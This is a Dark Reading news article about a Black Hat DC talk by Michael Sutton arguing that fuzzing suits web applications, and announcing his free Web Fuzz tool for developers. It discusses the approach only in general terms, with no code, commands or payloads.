Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


05:30 AM
Connect Directly

Here Comes the (Web) Fuzz

Black Hat researcher says fuzzing Web applications is the next big thing, will release free tool

Fuzzing has traditionally been a popular tool for hackers searching for network-based vulnerabilities -- but not so much for Web applications. That soon could change, however, according to a Black Hat researcher who says fuzzing is even better suited for finding flaws in Web applications.

Michael Sutton, security evangelist for SPI Dynamics, this week at the Black Hat DC briefings in Arlington, Va., will release a free homegrown Web fuzzing tool that he developed, called Web Fuzz. Fuzzers are basically automated brute-force testing tools that send random or unexpected input in the form of a request or packet in order to detect vulnerabilities in applications.

The fact that the fuzzing process can be highly automated makes it a perfect fit for Web app developers, Sutton says, and Web apps have very structured ways of accepting user input.

Today's Web technology makes it especially simple to develop Web apps. That means fewer technical users are building these apps, too. "It would never be realistic that my Web developers would do reverse-engineering to find vulnerabilities. But it would be realistic for them to use a tool they are comfortable with like fuzzing during the development process," says Sutton, who will discuss Web app fuzzing in his "Smashing Web Apps: Applying Fuzzing to Web Applications and Web Services" session at Black Hat.

"The beauty of fuzzing is its simplicity," he says.

Web applications are wearing a big bull's eye lately for vulnerabilities -- about half of all vulnerabilities reported today are Web app-based ones, Sutton says. XSS, SQL injection, and php-file-include (all Web-related attacks) were the CVE's top three attack methods for 2006, Sutton notes. And because Web apps have very standardized ways of providing user input, you can exploit that for fuzzing purposes, he says. (See Cross-Site Scripting: Attackers' New Favorite Flaw.)

"Web apps are very well-geared for fuzzing."

But fuzzing won't solve Web application security troubles. "It's not a silver bullet. It has its limitations," Sutton says. "It's not going to find that complex vulnerability or that multi-stage attack."

It will make things easier on Web developers, however, who don't necessarily have vendors to fall back on when bugs arise in their apps. "You're totally on your own. You created the app, you created the vulnerability, and it's your responsibility to create the fix for it," Sutton says. "In the best case, you find it, and the worst case, someone else finds it externally... There's no global notification system [for these bugs]."

With a fuzzer, a Web services developer could then easily test her Web app before it goes live. "It used to be that you'd assemble the security team, and that was OK with network layer vulnerabilities, because they could find them and were empowered to fix them." You could throw up a firewall or IDS to plug a buffer overflow in an app, Sutton says.

"But in the Web app world, the security team isn't empowered to fix the holes. They can't just block off traffic. The only way to fix it is at the development side," he says. "And if we don't involve developers, they are going to make the same [security] mistakes over and over again."

It's the easy stuff that fuzzers can pinpoint, Sutton says. He calls it the "FUGGLE" phenomenon: Fuzzing Using Google Gets Low-Hanging Fruit Easily. "The power of fuzzing with Google is you can Google for sites that are going to be vulnerable to attack. Then you make a request for them using Google fuzzing to see if they could find indicators of what vulnerabilities" are there, he says.

Sutton says a combination of search engine queries and basic Web page requests can identify previously unknown vulnerabilities, so it would also be simple for phishers and spammers to use the same techniques to find their targets.

Meanwhile, Sutton says his Web Fuzz tool is not related to his company's testing tool that comes with built-in fuzzing, SPI Dynamics' WebInspect. OWASP also offers a free fuzzer, WSFuzzer, he notes. Aside from SPI Dynamics, Beyond Security and Mu Security are some other vendors who sell commercial fuzzing tools, he says. Researcher HD Moore also offers his AxMan ActiveX fuzzing tool for free. (See Free Fuzzing Tool Launched.)

— Kelly Jackson Higgins, Senior Editor, Dark Reading

  • SPI Dynamics Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio

    Comment  | 
    Print  | 
    More Insights
  • Comments
    Newest First  |  Oldest First  |  Threaded View
    Inside the Ransomware Campaigns Targeting Exchange Servers
    Kelly Sheridan, Staff Editor, Dark Reading,  4/2/2021
    Beyond MITRE ATT&CK: The Case for a New Cyber Kill Chain
    Rik Turner, Principal Analyst, Infrastructure Solutions, Omdia,  3/30/2021
    Register for Dark Reading Newsletters
    White Papers
    Current Issue
    2021 Top Enterprise IT Trends
    We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
    Flash Poll
    How Enterprises are Developing Secure Applications
    How Enterprises are Developing Secure Applications
    Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
    Twitter Feed
    Dark Reading - Bug Report
    Bug Report
    Enterprise Vulnerabilities
    From DHS/US-CERT's National Vulnerability Database
    PUBLISHED: 2021-04-17
    A command injection vulnerability has been reported to affect QTS and QuTS hero. If exploited, this vulnerability allows attackers to execute arbitrary commands in a compromised application. We have already fixed this vulnerability in the following versions: QTS Build 20210202 and later Q...
    PUBLISHED: 2021-04-17
    An SQL injection vulnerability has been reported to affect QNAP NAS running Multimedia Console or the Media Streaming add-on. If exploited, the vulnerability allows remote attackers to obtain application information. QNAP has already fixed this vulnerability in the following versions of Multimedia C...
    PUBLISHED: 2021-04-16
    jose-node-esm-runtime is an npm package which provides a number of cryptographic functions. In versions prior to 3.11.4 the AES_CBC_HMAC_SHA2 Algorithm (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDe...
    PUBLISHED: 2021-04-16
    jose-node-cjs-runtime is an npm package which provides a number of cryptographic functions. In versions prior to 3.11.4 the AES_CBC_HMAC_SHA2 Algorithm (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDe...
    PUBLISHED: 2021-04-16
    Portofino is an open source web development framework. Portofino before version 5.2.1 did not properly verify the signature of JSON Web Tokens. This allows forging a valid JWT. The issue will be patched in the upcoming 5.2.1 release.